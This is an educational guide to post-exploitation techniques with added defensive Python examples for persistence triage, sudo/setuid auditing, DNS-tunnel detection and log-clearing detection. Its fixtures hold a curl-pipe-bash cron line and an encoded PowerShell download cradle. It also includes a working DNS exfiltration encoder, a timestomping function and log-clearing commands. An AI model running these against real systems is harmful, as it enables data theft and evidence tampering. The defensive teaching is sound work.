Post-exploitation is a critical phase in network security, focusing on actions taken after gaining initial access to a system. It involves maintaining access, escalating privileges, and moving laterally through the network to achieve the attacker's objectives.
This topic covers key aspects of post-exploitation, including persistence mechanisms, privilege escalation techniques, lateral movement strategies, and data exfiltration methods. Understanding these concepts is crucial for both offensive and defensive security professionals.
Maintaining access
- Maintaining access is a crucial aspect of post-exploitation in network security, allowing attackers to retain control over compromised systems
- Involves deploying various techniques and tools to ensure persistent access to the target network, even if the initial entry point is discovered or patched
- Enables attackers to continue their malicious activities, gather sensitive data, and potentially use the compromised system as a launching pad for further attacks
Backdoors and trojans
- Backdoors provide unauthorized access to a system by bypassing its normal authentication mechanisms; remote access trojans (RATs) are the most common form
- Trojans disguise themselves as legitimate software but contain malicious code that grants attackers control over the infected system
- Backdoors and trojans can be installed through various means, such as phishing emails, exploiting vulnerabilities, or social engineering tactics
- Once installed, they establish a covert communication channel between the attacker and the compromised system
- Examples of famous backdoors and trojans include Back Orifice, SubSeven, and ZeuS
Rootkits and bootkits
- Rootkits are malicious software designed to hide the presence of other malware or unauthorized activities on a compromised system
- They operate at a low level, often modifying the operating system kernel or critical system files to evade detection by security software
- Bootkits are rootkits that infect the boot chain, either the master boot record (MBR) or volume boot record on legacy BIOS systems or the boot loader and firmware on unified extensible firmware interface (UEFI) systems, so they load before the operating system and can survive an OS reinstall; a firmware-resident implant can even survive replacing the disk. Secure Boot and measured boot with remote attestation are the controls aimed at this layer
- Examples of rootkits include the XCP copy-protection rootkit that Sony BMG shipped on audio CDs in 2005 and the kernel-mode driver component of the Stuxnet worm, which was signed with stolen code-signing certificates to get past driver signature checks
Persistence mechanisms
- Persistence mechanisms ensure that the attacker's access to the compromised system survives reboots, system updates, or user interventions
- Common persistence techniques include modifying system startup files (registry keys, init scripts), installing service or daemon processes, and hijacking legitimate system binaries
- Attackers may also use scheduled tasks or cronjobs to execute malicious code at predetermined intervals
- Application-level persistence can be achieved by hooking into popular software, such as web browsers or productivity tools, to maintain access
- Examples of persistence mechanisms include the use of "run keys" in the Windows registry and the creation of hidden user accounts with administrative privileges
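The autostart locations listed above are where a responder looks first. The following is an added example, not code from the original page: it parses a `reg export` dump of the HKCU Run key and `crontab -l` output (both constructed samples, including a base64 payload built to decode to a recognisable download cradle) and flags the first-pass indicators: binaries running from temp, user-writable or hidden directories, hidden or encoded PowerShell, and download-and-execute one-liners. The function names and the heuristics are this example's own.

```python
"""Triage of autostart entries for suspicious persistence (added example)."""
import base64
import re

# Constructed sample: shape of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run out.reg`
SAMPLE_REG = r'''
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe"
"Sync"="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
'''

# Constructed sample: `crontab -l` on a Linux host
SAMPLE_CRON = '''
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.7/u.sh | bash
@reboot /tmp/.x/agent
'''

# Binaries launched from temp, user-writable or hidden directories. Windows paths are
# matched after .reg unescaping; the Microsoft\ exclusion keeps per-user Microsoft
# installs such as OneDrive out of the noise.
SUSPICIOUS_PATH = re.compile(
    r'\\temp\\|\\appdata\\(local|roaming)\\(?!microsoft\\)|\\users\\public\\'
    r'|^/tmp/|^/dev/shm/|^/var/tmp/|/\.[^/]+/', re.I)
# -EncodedCommand and its short forms; capture the base64 so the real command can be shown
ENCODED_PS = re.compile(
    r'powershell(?:\.exe)?.*?\s-(?:e|ec|enc|encodedcommand)\s+(?P<b64>[A-Za-z0-9+/=]+)', re.I)
HIDDEN_WINDOW = re.compile(r'\s-w(?:indowstyle)?\s+hidden\b', re.I)
# Download-and-execute one-liners, Unix and PowerShell flavours
DOWNLOAD_EXEC = re.compile(
    r'\b(curl|wget)\b.*\|\s*(ba|z)?sh\b|\bIEX\b|Invoke-Expression|DownloadString', re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand payloads are base64 of UTF-16LE text."""
    raw = base64.b64decode(b64 + '=' * (-len(b64) % 4))
    return raw.decode('utf-16le', errors='replace')


def parse_reg_run_values(text: str):
    """Yield (source, value name, command) from a .reg export of a Run key."""
    for line in text.splitlines():
        m = re.match(r'^"([^"]+)"="(.*)"$', line.strip())
        if m:
            name, data = m.groups()
            # .reg escaping: backslashes are doubled, quotes are backslash-escaped
            yield 'HKCU Run', name, data.replace('\\\\', '\\').replace('\\"', '"')


def parse_crontab(text: str):
    """Yield (source, schedule, command) from `crontab -l` output."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('@'):                 # @reboot, @daily, ...
            sched, cmd = line.split(None, 1)
        else:
            parts = line.split(None, 5)          # five time fields, then the command
            if len(parts) < 6:
                continue
            sched, cmd = ' '.join(parts[:5]), parts[5]
        yield 'crontab', sched, cmd


def triage(entries):
    """Return [(source, name, [reasons])] for entries matching any indicator."""
    findings = []
    for source, name, cmd in entries:
        reasons = []
        if SUSPICIOUS_PATH.search(cmd):
            reasons.append('runs from temp, user-writable or hidden path')
        if HIDDEN_WINDOW.search(cmd):
            reasons.append('hidden PowerShell window')
        decoded = ''
        m = ENCODED_PS.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group('b64'))
            reasons.append('encoded PowerShell: ' + decoded[:60])
        if DOWNLOAD_EXEC.search(cmd + ' ' + decoded):   # scan the decoded text too
            reasons.append('download-and-execute pattern')
        if reasons:
            findings.append((source, name, reasons))
    return findings


def run_triage():
    entries = list(parse_reg_run_values(SAMPLE_REG)) + list(parse_crontab(SAMPLE_CRON))
    return triage(entries)


if __name__ == '__main__':
    for source, name, reasons in run_triage():
        print(f'[{source}] {name}: ' + '; '.join(reasons))
```

On the samples, OneDrive and the certbot renewal pass; the Temp-resident "svchost.exe", the encoded PowerShell (whose payload decodes to the start of an `IEX (New-Object ...)` cradle), the `curl | bash` job and the hidden `/tmp/.x/agent` are flagged. The same checks apply to the other locations named above (services, scheduled tasks, WMI subscriptions, init scripts); the parsers are the only part that changes.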
Privilege escalation
- Privilege escalation is the process of exploiting vulnerabilities or misconfigurations to gain higher-level permissions on a compromised system
- Attackers seek to escalate privileges to access sensitive data, install additional malware, or perform actions that require administrative rights
- Privilege escalation can be classified into vertical and horizontal escalation, depending on the scope and nature of the elevated privileges
Vertical privilege escalation
- Vertical privilege escalation means moving from a lower privilege level to a higher one, typically from a standard user to administrator, SYSTEM or root
- Attackers exploit vulnerabilities in the operating system or applications, or misconfigurations, to make that jump
- Common techniques include exploiting unpatched local vulnerabilities, abusing sudo rules (for example NOPASSWD entries for binaries that can spawn a shell), leveraging insecure setuid binaries, and, on Windows, abusing writable service binaries or unquoted service paths
- An example is Dirty COW (CVE-2016-5195), a Linux kernel race condition that let an unprivileged user write to read-only files such as /etc/passwd; the EternalBlue exploit used by WannaCry is a remote kernel-mode exploit rather than a local escalation and is covered under kernel exploits below
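Two of the misconfigurations named above, sudo rules and setuid binaries, can be audited from the output of the commands an attacker would run anyway. The following is an added example, not from the original page: it parses constructed `sudo -l` output and a constructed `find / -perm -4000 -type f` listing and flags shell-escaping binaries run as root, user-controlled environments, non-standard paths, and setuid files outside a baseline. The shell-escape set is an illustrative subset of the well-known GTFOBins-style list, not a complete catalogue; function names and the baseline are this example's own.

```python
"""Audit of sudo rules and setuid binaries for local privilege-escalation paths (added example)."""
import os
import re

# Constructed sample: `sudo -l` as the compromised user
SAMPLE_SUDO_L = '''
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User alice may run the following commands on web01:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (root) NOPASSWD: /usr/bin/find
    (root) SETENV: /opt/backup/run.sh
'''

# Constructed sample: `find / -perm -4000 -type f 2>/dev/null`
SAMPLE_SETUID = '''
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount
/usr/local/bin/backup
/usr/bin/python3.10
'''

# Binaries that can spawn a shell or write arbitrary files when run as root (subset)
SHELL_ESCAPES = {'vim', 'vi', 'nano', 'less', 'more', 'man', 'find', 'awk', 'gawk',
                 'perl', 'python', 'ruby', 'env', 'bash', 'sh', 'zsh',
                 'tar', 'zip', 'git', 'tcpdump', 'nmap'}
# Setuid-root binaries a stock install is expected to carry (subset; build from a clean image)
SETUID_BASELINE = {'/usr/bin/passwd', '/usr/bin/sudo', '/usr/bin/su', '/usr/bin/newgrp',
                   '/usr/bin/chsh', '/usr/bin/chfn', '/usr/bin/gpasswd', '/usr/bin/mount',
                   '/usr/bin/umount', '/usr/bin/fusermount'}

# "(runas) TAG: TAG: command args"
RULE = re.compile(r'^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$')


def _strip_version(base: str) -> str:
    """python3.10 -> python, so interpreter variants hit the same entry."""
    return re.sub(r'[\d.]+$', '', base)


def parse_sudo_l(text: str):
    """Return [(runas, {tags}, command)] for each rule line of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line.strip())
        if m:
            tags = {t.rstrip(':') for t in m.group('tags').split()}
            rules.append((m.group('runas'), tags, m.group('cmd').strip()))
    return rules


def audit_sudo(rules):
    """Return [(command, reason)] for rules that give a path to root."""
    findings = []
    for runas, tags, cmd in rules:
        binary = cmd.split()[0]
        base = _strip_version(os.path.basename(binary))
        if cmd == 'ALL':
            findings.append((cmd, 'unrestricted sudo: equivalent to root'))
        elif base in SHELL_ESCAPES:
            how = 'without a password' if 'NOPASSWD' in tags else "with the user's own password"
            findings.append((cmd, f'{base} can spawn a root shell {how}'))
        elif 'SETENV' in tags:
            findings.append((cmd, 'user-controlled environment for a root command'))
        elif not binary.startswith(('/usr/bin/', '/usr/sbin/', '/bin/', '/sbin/')):
            findings.append((cmd, 'non-standard path: check the file and its directory are not user-writable'))
    return findings


def audit_setuid(listing: str):
    """Return [(path, reason)] for setuid files that are interpreters or off-baseline."""
    findings = []
    for path in (l.strip() for l in listing.splitlines() if l.strip()):
        base = _strip_version(os.path.basename(path))
        if base in SHELL_ESCAPES:
            findings.append((path, 'interpreter or shell-escaping binary is setuid'))
        elif path not in SETUID_BASELINE:
            findings.append((path, 'setuid binary not in baseline: inspect'))
    return findings


if __name__ == '__main__':
    for cmd, reason in audit_sudo(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f'sudo   {cmd}: {reason}')
    for path, reason in audit_setuid(SAMPLE_SETUID):
        print(f'setuid {path}: {reason}')
```

Against the samples, `systemctl restart nginx` and the stock setuid binaries pass; `vim` and `find` under NOPASSWD, the SETENV script, the unknown `/usr/local/bin/backup` and a setuid Python interpreter are reported. The baseline set is the part worth investing in: generate it from a clean image of the same distribution release rather than hand-maintaining it.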
Horizontal privilege escalation
- Horizontal privilege escalation involves gaining access to resources or user accounts that are at the same privilege level as the attacker's current user
- Attackers exploit misconfigurations, weak access controls, or stolen credentials to access other accounts or resources at the same privilege tier, such as another employee's mailbox or file share
- Techniques used in horizontal privilege escalation include exploiting file and folder permissions, abusing shared resources, and conducting pass-the-hash attacks
- An example of horizontal privilege escalation is using Mimikatz on a shared workstation to extract another standard user's credentials from LSASS memory and reusing them to reach that user's data
Kernel exploits
- Kernel exploits target vulnerabilities in the operating system kernel to gain unrestricted access to the system
- Successful exploitation of a kernel vulnerability can lead to complete system compromise, as the kernel operates with the highest privileges
- Attackers may use publicly available exploit code or develop custom exploits to target specific kernel versions and configurations
- Examples include EternalBlue (MS17-010), a remote exploit of the SMBv1 implementation in the Windows srv.sys kernel driver that gave the WannaCry and NotPetya worms SYSTEM-level code execution, and Dirty COW (CVE-2016-5195) in the Linux kernel. Because distributions backport fixes, comparing a kernel version string against a CVE's advertised fixed version is unreliable; check the distribution's changelog or test for the specific patch
Social engineering tactics
- Social engineering tactics can be employed to trick users into disclosing their credentials or granting elevated permissions to the attacker
- Attackers may pose as legitimate users, such as system administrators or IT support personnel, to convince victims to share sensitive information or perform actions that compromise security
- Phishing emails, spear-phishing, and voice phishing (vishing) are common social engineering techniques used to obtain user credentials or trick users into installing malware
- An example of social engineering for privilege escalation is an attacker impersonating an IT helpdesk employee and convincing a user to grant remote access to their system
Lateral movement
- Lateral movement refers to the techniques attackers use to navigate and expand their access within a compromised network
- Once an initial foothold is established, attackers seek to move laterally to other systems, escalate privileges, and gain access to sensitive data or critical assets
- Lateral movement allows attackers to maintain persistence, evade detection, and increase the impact of their attack
Network scanning and enumeration
- Network scanning involves using tools to discover and map the target network, identifying live hosts, open ports, and running services
- Enumeration techniques gather information about the compromised systems, such as user accounts, network shares, and system configurations
- Attackers may use port scanners (Nmap), vulnerability scanners (Nessus), and Active Directory enumeration tools (BloodHound) to identify targets for lateral movement; LLMNR/NBT-NS poisoners such as Responder are not discovery tools but capture NTLM credentials from hosts on the same segment that answer broadcast name lookups
- Example: An attacker using Nmap to scan the internal network, discovering a vulnerable file server that can be exploited to gain a foothold in another network segment
Pivoting techniques
- Pivoting involves using a compromised system as a gateway to access and attack other systems within the network that are not directly accessible from the attacker's machine
- Attackers may use tools like Metasploit's Meterpreter, SSH tunneling, or SOCKS proxies to route their traffic through the compromised system and reach otherwise inaccessible targets
- Pivoting allows attackers to bypass network segmentation, firewalls, and other security controls that limit direct access to certain parts of the network
- Example: An attacker compromising a web server in the DMZ and using it as a pivot point to access and exploit systems in the internal corporate network
Pass-the-hash attacks
- Pass-the-hash attacks exploit the fact that in NTLM authentication the NT hash of a password is itself the authentication key, so possessing the hash is equivalent to possessing the password (the weaker LM hash is disabled by default on modern Windows)
- Attackers obtain hashes from LSASS memory, the local SAM database, or a domain controller's NTDS.dit and reuse them to authenticate to other systems without ever recovering the plaintext
- Tools like Mimikatz and Windows Credential Editor (WCE) extract hashes from a running system; Kerberos is not directly susceptible, though the same NT hash can be used to request Kerberos tickets (overpass-the-hash)
- Example: An attacker using Mimikatz to extract the NTLM hash of a domain administrator from a compromised workstation and using it to access and control other systems in the domain
Remote desktop protocol (RDP) hijacking
- RDP hijacking involves taking over an existing RDP session or creating a new unauthorized RDP connection to a target system
- Attackers may exploit vulnerabilities in the RDP protocol, use stolen credentials, or perform man-in-the-middle attacks to gain unauthorized access to remote systems
- Once connected, attackers can interact with the remote system as if they were sitting in front of it, allowing them to perform various malicious activities and move laterally within the network
- Example: An attacker running as SYSTEM (for example via a service or a scheduled task) using the built-in tscon utility to attach a disconnected RDP session of a still-logged-in user to their own session, taking over that user's desktop without knowing their password
Data exfiltration
- Data exfiltration is the unauthorized transfer of sensitive data from a compromised system or network to an attacker-controlled location
- Attackers may steal intellectual property, customer data, financial information, or other valuable assets to sell on the black market, use for blackmail, or gain a competitive advantage
- Data exfiltration can occur through various channels, such as network-based transfers, physical media, or covert communication methods
Network-based exfiltration
- Network-based exfiltration involves moving data out of the compromised network over common protocols like HTTP, HTTPS, FTP, or DNS that are usually allowed outbound
- Attackers may use tools like Wget, Curl, or custom scripts to upload stolen data to remote servers or cloud storage services
- Data can be compressed, encrypted, or split into smaller chunks to avoid detection by network-based security controls
- Example: An attacker using DNS tunneling to exfiltrate sensitive documents by encoding them into DNS queries and sending them to a domain under their control
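The DNS tunneling example above hides a lot of mechanics, and those mechanics are exactly what a detector keys on. The following is an added example, not from the original page or from any real tunnelling tool: the encoder chunks a document into base32 labels under an attacker-controlled zone (the constructed `cdn-metrics.example`), the decoder reassembles it from the queries the authoritative server would see even if they arrive out of order, and `name_features()` computes the indicators a detector uses. Function names, thresholds and the sample document are this example's own.

```python
"""DNS-tunnel exfiltration: how the data is packed, and what that does to the query names (added example)."""
import base64
import collections
import math

MAX_LABEL = 63          # RFC 1035 label limit
MAX_NAME = 253          # practical limit for a full name in presentation form
LABELS_PER_QUERY = 3
ZONE = 'cdn-metrics.example'   # constructed attacker zone

# Constructed stolen document
SAMPLE_DOC = (b"CONFIDENTIAL - Q3 board pack\nRevenue: 48.2M (+11%)\nChurn: 3.1%\n"
              b"M&A: Northwind Traders, indicative offer 210M cash, exclusivity to 30 Nov\n") * 2


def encode_for_dns(data: bytes, zone: str, session: str = 'a1') -> list:
    """Return the query names that carry `data`, in order.
    DNS is case-insensitive, so base32 (not base64) is used for the payload."""
    payload = base64.b32encode(data).decode().rstrip('=').lower()
    per_query = MAX_LABEL * LABELS_PER_QUERY
    names = []
    for seq, pos in enumerate(range(0, len(payload), per_query)):
        chunk = payload[pos:pos + per_query]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = '.'.join([f'{session}-{seq:04d}'] + labels + [zone])   # sequence label first
        if len(name) > MAX_NAME:
            raise ValueError('zone too long for this chunking')
        names.append(name)
    return names


def decode_from_dns(names, zone: str) -> bytes:
    """Reassemble from (possibly reordered) queries using the sequence label."""
    chunks = {}
    for name in names:
        labels = name[:-len(zone) - 1].split('.')        # strip '.zone'
        _session, seq = labels[0].split('-')
        chunks[int(seq)] = ''.join(labels[1:])
    payload = ''.join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(payload + '=' * (-len(payload) % 8))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = collections.Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def name_features(name: str) -> dict:
    """Treat the last two labels as the registered domain and measure everything left of it."""
    labels = name.lower().rstrip('.').split('.')
    sub = labels[:-2]
    joined = ''.join(sub)
    return {'longest_label': max((len(l) for l in sub), default=0),
            'sub_len': len(joined),
            'entropy': shannon_entropy(joined)}


def is_suspicious(name: str) -> bool:
    """Long labels are the strongest single signal; long and high-entropy is the fallback."""
    f = name_features(name)
    return f['longest_label'] > 32 or (f['sub_len'] > 40 and f['entropy'] > 3.8)


# Constructed benign names for comparison
BENIGN = ['www.example.com', 'login.microsoftonline.com', 'api-v2-prod.example.net',
          'outlook.office365.com', 'ocsp.digicert.com']

if __name__ == '__main__':
    queries = encode_for_dns(SAMPLE_DOC, ZONE)
    for q in queries:
        print(is_suspicious(q), name_features(q), q[:60] + '...')
    print(decode_from_dns(list(reversed(queries)), ZONE) == SAMPLE_DOC)
```

Real tunnels (iodine, dnscat2) differ in framing, record types and compression, but produce the same shape: labels near the 63-byte limit, entropy close to the alphabet maximum, and hundreds of unique names under one parent domain that never repeat. Counting distinct subdomains per parent over a time window is the best way to cut false positives, because the legitimate users of long labels (antivirus cloud lookups, DKIM and ACME records) reuse a small set of names.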
Physical media exfiltration
- Physical media exfiltration involves copying stolen data onto removable storage devices, such as USB drives, external hard drives, or optical discs
- Attackers may use malware or scripts to automatically search for and copy sensitive files onto the connected storage devices
- Social engineering tactics can also be employed to trick employees into plugging in malicious USB drives or transferring data onto attacker-provided media
- Example: An attacker using a tool like USB Thief to automatically copy selected files from a compromised system onto a connected USB drive when it is inserted
Covert communication channels
- Covert communication channels are used to exfiltrate data in a manner that is difficult to detect or distinguish from legitimate traffic
- Attackers may use techniques like steganography, where data is hidden within images, videos, or other file formats, to avoid raising suspicion
- Other covert channels include using legitimate services like social media platforms, email, or instant messaging to transfer data in small, inconspicuous pieces
- Example: An attacker using a steganography tool to embed stolen credit card numbers into an image file and posting it on a public image-sharing platform
Steganography and data hiding
- Steganography is the practice of concealing data within another file format, such as images, audio, or video files, to avoid detection
- Data hiding techniques can also involve using alternate data streams (ADS) in file systems, hiding data in unused disk space, or leveraging file system attributes
- Attackers may use steganography to exfiltrate sensitive information, deliver malware payloads, or establish covert communication channels
- Example: An attacker using a tool like OpenStego to hide a confidential document within an innocuous-looking JPEG image and sending it via email to an external recipient
Covering tracks
- Covering tracks, also known as anti-forensics, involves techniques used by attackers to hide their activities, delete evidence, and make it difficult for investigators to trace their actions
- Attackers aim to evade detection, maintain access to compromised systems, and prevent forensic analysis from attributing the attack to them
- Common techniques for covering tracks include log tampering, timestomping, removing artifacts, and employing anti-forensics tools
Log tampering and deletion
- Log tampering involves modifying or deleting system logs, security event logs, or application logs to remove any evidence of the attacker's activities
- Attackers may use tools or scripts to selectively delete log entries related to their actions, such as login attempts, file access, or network connections
- Log clearing can be performed with built-in utilities (wevtutil cl Security, Clear-EventLog, the clear action in Event Viewer, log rotation on Unix hosts) or with tools that edit individual records out of the log file
- Example: An attacker using PowerShell to clear the Windows Security log and deleting the PSReadLine history file (ConsoleHost_history.txt) to hide their traces. The cover-up is itself logged: clearing the Security log writes event ID 1102 ("The audit log was cleared") as the first record of the fresh log, and clearing any other log writes event ID 104 to the System log, so a pipeline that forwards events off the host turns the wipe into an alert
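Those two signals, the explicit clear events and the numbering the Event Log service assigns, are enough for a first detector. The following is an added example, not from the original page: it runs over a constructed list of event records in the shape a SIEM receives from Windows Event Forwarding and applies two checks, the clear events (1102 in Security, 104 in System) and discontinuities in EventRecordID, which is assigned sequentially per log so that a gap means records were removed and a reset means the log was replaced. Field names and sample values are this example's own.

```python
"""Spotting log clearing and record removal in forwarded Windows event data (added example)."""

# Constructed sample: Security and System records as collected by a forwarder, in arrival order
SAMPLE_EVENTS = [
    {'Channel': 'Security', 'EventRecordID': 5101, 'EventID': 4624, 'Time': '2024-03-04T09:00:01Z', 'User': 'alice'},
    {'Channel': 'Security', 'EventRecordID': 5102, 'EventID': 4672, 'Time': '2024-03-04T09:00:01Z', 'User': 'alice'},
    {'Channel': 'Security', 'EventRecordID': 5103, 'EventID': 4688, 'Time': '2024-03-04T09:00:03Z', 'User': 'alice'},
    # 5104-5106 are absent: records edited out of the .evtx
    {'Channel': 'Security', 'EventRecordID': 5107, 'EventID': 4688, 'Time': '2024-03-04T09:41:12Z', 'User': 'alice'},
    # the whole log is then cleared; 1102 is the first record of the new log and numbering restarts
    {'Channel': 'Security', 'EventRecordID': 1, 'EventID': 1102, 'Time': '2024-03-04T09:45:00Z', 'User': 'alice'},
    {'Channel': 'System', 'EventRecordID': 880, 'EventID': 7036, 'Time': '2024-03-04T09:45:02Z', 'User': 'SYSTEM'},
    {'Channel': 'System', 'EventRecordID': 881, 'EventID': 104, 'Time': '2024-03-04T09:45:30Z', 'User': 'alice',
     'LogCleared': 'Microsoft-Windows-PowerShell/Operational'},
]

# (channel, event id) pairs that record a log being cleared
CLEAR_EVENTS = {('Security', 1102): 'Security log cleared', ('System', 104): 'event log cleared'}


def find_clear_events(events):
    """Return (time, channel, event id, user, which log, description) for each clear event."""
    out = []
    for e in events:
        key = (e['Channel'], e['EventID'])
        if key in CLEAR_EVENTS:
            out.append((e['Time'], e['Channel'], e['EventID'], e.get('User'),
                        e.get('LogCleared', e['Channel']), CLEAR_EVENTS[key]))
    return out


def find_record_discontinuities(events):
    """Per channel, compare consecutive EventRecordIDs in arrival order.
    A jump means records are missing; a decrease means the log was cleared or replaced."""
    last = {}
    findings = []
    for e in events:
        ch, rid = e['Channel'], e['EventRecordID']
        if ch in last:
            prev = last[ch]
            if rid < prev:
                findings.append((ch, prev, rid, 'record id reset: log cleared or replaced'))
            elif rid - prev > 1:
                findings.append((ch, prev, rid, f'{rid - prev - 1} records missing'))
        last[ch] = rid
    return findings


if __name__ == '__main__':
    for f in find_clear_events(SAMPLE_EVENTS):
        print('clear:', f)
    for f in find_record_discontinuities(SAMPLE_EVENTS):
        print('gap:  ', f)
```

Two caveats a detection engineer would add: forwarding agents can drop events under load, so a gap alone is a lead rather than proof and should be corroborated with the 1102/104 events or with EDR telemetry for the same window; and since the check compares records in arrival order, it must run on the raw forwarded stream, not on a store that has re-sorted by time.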
Timestomping
- Timestomping is a technique used to modify the timestamps of files, directories, or other system artifacts to mislead investigators about when the malicious activities occurred
- Attackers can change the creation, modification, or access timestamps of files to match those of legitimate files or to a time before the attack took place
- Timestomping can be performed with built-in commands (touch -t or touch -r on Unix; setting LastWriteTime and CreationTime through PowerShell) or with specialized tools such as Timestomp from the Metasploit Anti-Forensics Project
- Example: An attacker using Timestomp to set a malware executable's timestamps to match those of a legitimate system file, so it appears to have been present since the OS was installed. The caveat for investigators: such tools rewrite the $STANDARD_INFORMATION timestamps in the NTFS MFT record while the $FILE_NAME attribute keeps its own set, and on Unix the inode change time (ctime) is updated by the very call that rewrites mtime, so a mismatch between the two sets is the classic indicator
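The POSIX half of that caveat can be shown on any Linux or macOS host. The following is an added example, not from the original page: `timestomp()` does what `touch -t` does (set atime and mtime); `utime()` offers no control over the inode change time and the kernel stamps it with the current time as part of that call, so a file whose mtime is years older than its ctime deserves a look. The function names and the one-day threshold are this example's own; the demo writes only to a temporary directory.

```python
"""Timestomping on a POSIX filesystem and the artifact it cannot erase (added example)."""
import os
import tempfile

NS = 1_000_000_000


def timestomp(path: str, mtime_ns: int, atime_ns: int = None) -> None:
    """Set access and modification times, like `touch -t`. ctime is not settable here."""
    os.utime(path, ns=(mtime_ns if atime_ns is None else atime_ns, mtime_ns))


def ctime_mtime_drift_s(path: str) -> float:
    """Seconds by which the inode change time postdates the modification time.
    On Linux/macOS st_ctime is the inode change time; on Windows Python reports creation
    time there instead, and this heuristic does not apply."""
    st = os.stat(path)
    return (st.st_ctime_ns - st.st_mtime_ns) / NS


def looks_timestomped(path: str, threshold_s: float = 86400) -> bool:
    """A file that was written and then left alone has ctime ~= mtime. A large positive gap
    means its metadata was changed long after the modification it claims."""
    return ctime_mtime_drift_s(path) > threshold_s


def demo() -> dict:
    target_mtime_ns = 1420070400 * NS           # 2015-01-01T00:00:00Z: an OS-install-era date
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, 'svchost.exe')   # constructed stand-in for a dropped payload
        with open(path, 'wb') as fh:
            fh.write(b'MZ constructed payload')
        fresh = looks_timestomped(path)         # just written: ctime and mtime agree
        timestomp(path, target_mtime_ns)        # backdate it
        st = os.stat(path)
        return {'fresh_flagged': fresh,
                'mtime_set': st.st_mtime_ns == target_mtime_ns,
                'drift_days': round(ctime_mtime_drift_s(path) / 86400),
                'stomped_flagged': looks_timestomped(path)}


if __name__ == '__main__':
    print(demo())
```

The NTFS analogue is the $STANDARD_INFORMATION versus $FILE_NAME comparison in the MFT, and the USN change journal records the metadata change itself. Neither check is conclusive on its own (installers and backup restores also produce old mtimes with new ctimes), but a backdated executable in a user-writable directory with a fresh ctime is a strong lead.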
Removing artifacts and evidence
- Removing artifacts and evidence involves deleting or securely wiping files, directories, registry entries, or other system components that could reveal the attacker's presence or actions
- Attackers may use secure deletion tools to overwrite the contents of files before deleting them, preventing recovery through forensic techniques
- Other artifacts that may be removed include temporary files, browser history, command history, or cached data
- Example: An attacker using SDelete from Microsoft Sysinternals to overwrite and delete the staging directory that held stolen data once exfiltration is complete, so the copies cannot be recovered from the disk
Anti-forensics techniques
- Anti-forensics techniques are designed to interfere with or mislead forensic analysis, making it difficult for investigators to reconstruct the attacker's actions or gather evidence
- Attackers may use encryption to protect their tools, communication channels, or stolen data, rendering them inaccessible to forensic examiners without the proper decryption keys
- Other anti-forensics techniques include memory-resident (fileless) malware that avoids writing to disk, and obfuscation and packing to hide the true nature of malicious code
- Example: An attacker running a reflectively loaded, memory-only build of Mimikatz to extract credentials, leaving no executable on disk. Fileless does not mean traceless: PowerShell script block logging (event ID 4104), Sysmon process-access events for lsass.exe, and memory acquisition all still record it
Command and control (C2)
- Command and control (C2) refers to the infrastructure and communication channels used by attackers to control compromised systems, distribute commands, and exfiltrate data
- C2 servers act as the central hub for managing the compromised systems (bots or zombies) and orchestrating the attack campaign
- Attackers employ various C2 architectures, protocols, and techniques to establish and maintain control over the compromised systems while evading detection
Centralized vs decentralized C2
- Centralized C2 architectures rely on one or a few servers to control the compromised systems; this gives the attacker simple management at the cost of a single point of failure for takedown and blocking
- Decentralized C2 architectures distribute the control among multiple servers or use peer-to-peer (P2P) communication, making it more resilient to takedowns but harder to coordinate
- Hybrid C2 architectures combine elements of both centralized and decentralized models, using a tiered approach with multiple layers of C2 servers
- Example: A botnet using a centralized C2 server to distribute commands to the compromised systems, while a more sophisticated APT group employs a decentralized P2P model to maintain control even if some of the C2 nodes are discovered and taken down
Common C2 protocols and tools
- Attackers use various protocols for C2 communication, ranging from common ones like HTTP, HTTPS, and DNS to more obscure or custom protocols to evade detection
- Some common C2 tools include Cobalt Strike, Empire, Metasploit, and Pupy, which provide a range of features for managing compromised systems and executing commands
- Other C2 mechanisms involve using legitimate web services (Dropbox, Google Drive) or social media platforms (Twitter, Reddit) to blend in with normal traffic and avoid raising suspicion
- Example: An attacker using the Cobalt Strike framework to establish a C2 channel over HTTPS, encrypting the communication and making it appear as normal web traffic to network security monitoring tools
Domain fronting and redirection
- Domain fronting is a technique used to obscure the true destination of C2 traffic by using a legitimate domain as a front, making it appear as if the traffic is going to a benign service
- The technique exploits CDNs that route requests by the HTTP Host header rather than the TLS server name: the DNS lookup and the TLS SNI name a benign site hosted on the same CDN, while the Host header inside the encrypted tunnel names the attacker's own CDN distribution, which forwards to the real C2 server
- Because every part of the connection visible to the network (DNS, SNI, destination IP) points at the legitimate service, controls cannot block the C2 traffic without blocking the service; a TLS-inspecting proxy that compares SNI with Host is the control that catches it
- Example: An attacker using domain fronting through Amazon CloudFront so that compromised systems appeared to be talking to a well-known site on that CDN. CloudFront and Google's front ends began rejecting SNI/Host mismatches in 2018, so the technique now depends on finding providers that still permit them
Detecting and preventing C2 traffic
- Detecting C2 traffic involves a combination of network monitoring, behavioral analysis, and threat intelligence to identify suspicious communication patterns and known C2 indicators
